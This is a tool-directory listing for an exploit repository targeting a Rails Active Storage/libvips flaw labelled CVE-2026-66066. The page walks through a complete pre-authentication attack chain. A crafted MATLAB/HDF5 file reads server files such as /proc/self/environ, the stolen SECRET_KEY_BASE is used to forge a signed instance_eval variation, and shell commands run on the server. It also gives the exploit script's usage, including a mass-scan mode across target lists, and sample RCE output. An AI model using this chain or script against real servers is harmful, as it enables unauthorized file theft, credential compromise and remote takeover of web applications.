Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-66066 — CVE-2026-66066 — KindaRails2Shell: Rails Active Storage/libvips Arbitrary File Read → RCE. MATLAB/HDF5 dual-identity file → SECRET_KEY_BASE theft → forged variation. CVSS 9.5 | Rails < 8.1.3.1 | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-66066
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubshinthink/cve-2026-66066

CVE-2026-66066

CVE-2026-66066 — KindaRails2Shell: Rails Active Storage/libvips Arbitrary File Read → RCE. MATLAB/HDF5 dual-identity file → SECRET_KEY_BASE theft → forged variation. CVSS 9.5 | Rails < 8.1.3.1

View Repository
161 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-66066 — KindaRails2Shell

Rails Active Storage/libvips Arbitrary File Read → SECRET_KEY_BASE Theft → RCE


Overview

CVE-2026-66066 is a critical-severity (CVSS 9.5) pre-authentication arbitrary file read to remote code execution chain in Ruby on Rails Active Storage, affecting Rails 7.2.0–7.2.3.1, 8.0.0–8.0.5, and 8.1.0–8.1.3 in their default configuration.

The vulnerability exploits a four-layer parser confusion across Rails, libvips, libmatio, and HDF5. A crafted file with a MATLAB 5.0 header (satisfying libvips' sniffer) and an HDF5 v7.3 container (dispatched by libmatio) contains an external dataset pointing to an arbitrary server-side file path. When ActiveStorage processes this file as an image variant, the target file's bytes become image pixels — enabling arbitrary file read without authentication.

Once SECRET_KEY_BASE is recovered from /proc/self/environ or credential files, the attacker derives the Active Storage verifier key and forges a signed variation JSON containing instance_eval, achieving remote code execution.

Affected installs: 500K+ Rails applications (Rails 7+ default variant_processor = :vips) Discovered by: Ethiack Research Team + RyotaK (GMO Flatt Security) + bl0rph, July 2026 Patch: Rails 7.2.3.2 / 8.0.5.1 / 8.1.3.1 (July 29, 2026)

Affected Versions

BranchVulnerableFixed
7.2.x7.2.0 – 7.2.3.17.2.3.2
8.0.x8.0.0 – 8.0.58.0.5.1
8.1.x8.1.0 – 8.1.38.1.3.1

Rails 6.x affected only if variant_processor = :vips was manually enabled.

Discovered by: André Baptista, Bruno Mendes, Rafael Castilho (Ethiack); RyotaK (GMO Flatt Security); bl0rph Reference PoC: 0xsha/KindaRails2Shell Metasploit: exploit/multi/http/rails_activestorage_vips_rce


Vulnerability Mechanism

Root Cause: Four-Layer Parser Confusion

The exploit chains two independent content-type disagreements across four components:

Layer 1: Rails      → trusts client-declared content_type (image/png)
                      No byte re-identification on direct upload blobs.
Layer 2: libvips    → trusts magic bytes "MATLAB 5.0" at offset 0–9
                      Routes the file to matload without verifying the full header.
Layer 3: libmatio   → trusts version word 0x0200 at offset 124–125
                      Dispatches to HDF5 reader; ignores the descriptive text mismatch.
Layer 4: HDF5       → trusts external(path, offset, length) dataset reference
                      H5Dread transparently opens and reads the external file.
                      
Result: arbitrary file bytes returned as PNG pixel data.

The Dual-Identity File

BytesPurposeValue
0–9libvips snifferMATLAB 5.0
10–123PaddingSpaces
124–125libmatio dispatcher0x0200 (HDF5 v7.3)
126–127Endian marker0x4d49 (IM)
128–511HDF5 userblockPadding
512+HDF5 superblockContainer with external dataset

"No legitimate writer emits both MATLAB 5.0 at byte 0 and 0x0200 at byte 124."

Why It Works

  1. Client-declared content_type — Blob#variable? trusts the database column populated at direct upload time. No bytes are examined.
  2. libvips autodetection — Vips::Image.new_from_file iterates loaders; matload's sniffer checks only 10 bytes.
  3. libmatio version dispatch — Bytes 124–125 determine the parser; 0x0200 selects the HDF5 backend regardless of the descriptive text.
  4. HDF5 external datasets — H5Pset_external allows a dataset's raw bytes to reside in an arbitrary external file. libmatio calls H5Dread without checking H5Pget_external_count.
  5. Variation keys are blob-independent — A harvested variation key signs only the transform, not the blob ID, making them replayable across any uploaded blob.
  6. Vips transformer lacks method allowlist — Transformers::Vips inherits validate_transformation from the base class, which only blocks combine_options. Arbitrary method names pass through to Vips::Image.public_send.

Attack Flow

1. POST /rails/active_storage/direct_uploads
   blob[content_type]=image/png&blob[checksum]=<MD5_of_payload>
   → Rails persists blob with client-declared type, identified=false forever

2. PUT <storage_url>
   body=<MATLAB 5.0 + HDF5 external(/proc/self/environ) payload>
   → Payload uploaded, blob ready for processing

3. Harvest variation_key from any existing thumbnail on the app
   → og:image, HTML , API responses, Internet Archive

4. GET /rails/active_storage/representations/redirect/:signed_id/:variation_key/poc.png
   → ActiveStorage downloads blob, passes to libvips
   → libvips detects "MATLAB 5.0", routes to matload
   → libmatio sees 0x0200, opens HDF5 container
   → H5Dread resolves external(/proc/self/environ) → file bytes become pixels
   → PNG thumbnail returned to attacker

5. Decode PNG pixels → recover SECRET_KEY_BASE from environment

6. Derive verifier key: PBKDF2-HMAC-SHA256(SECRET_KEY_BASE, "ActiveStorage", 1000, 64)
   Forge signed variation: {"instance_eval" => "system('cmd > /tmp/out')"}
   Submit to representations route → RCE

Verified Source Code References

FilePurpose
activestorage/app/models/active_storage/blob.rbvariable? trusts content_type column
activestorage/app/models/active_storage/blob/representable.rbRepresentation route resolves blob + variation independently
activestorage/app/models/active_storage/variation.rbdecode verifies variation key; no cross-reference to blob
image_processing/lib/image_processing/transformers/vips.rbNo method allowlist — inherits base class behavior
libvips/foreign/matload.cvips__mat_ismat sniffs only first 10 bytes

Installation

git clone https://github.com/shinthink/CVE-2026-66066.git
cd CVE-2026-66066
pip install requests

Usage

# Full chain — file read → secret recovery → RCE
python cve_2026_66066.py -t rails-app.com

# Read a specific file
python cve_2026_66066.py -t rails-app.com --read /etc/passwd

# Provide SECRET_KEY_BASE directly (skip file read)
python cve_2026_66066.py -t rails-app.com --skb <secret> -c "id; hostname"

# Mass scan
python cve_2026_66066.py -f targets.txt -o rce.txt --threads 10

Arguments

  -t, --target       Single target URL
  -f, --file         Target list, one per line
  -c, --command      Shell command to execute (default: id)
  --read PATH        Read a specific file from the server
  --skb SECRET       Provide SECRET_KEY_BASE directly for RCE
  -o, --output       Save results to file
  --threads          Concurrent workers (default: 20)
  --timeout          HTTP request timeout in seconds
  --debug            Show every HTTP request
  -v, --verbose      Verbose output

Proof of Concept

Single Target

$ python cve_2026_66066.py -t rails-app.example.com
  KindaRails2Shell | CVE-2026-66066 | CVSS 9.5

  Host          : rails-app.example.com
  Rails         : YES
  ActiveStorage : YES
  File Read     : YES
  SECRET_KEY    : a1b2c3d4...
  RCE           : YES

  RCE Output:
  uid=1000(rails) gid=1000(rails) groups=1000(rails)
  rails-prod-01

File Read Only

$ python cve_2026_66066.py -t rails-app.com --read /proc/self/environ

FOFA / Shodan

Download Tool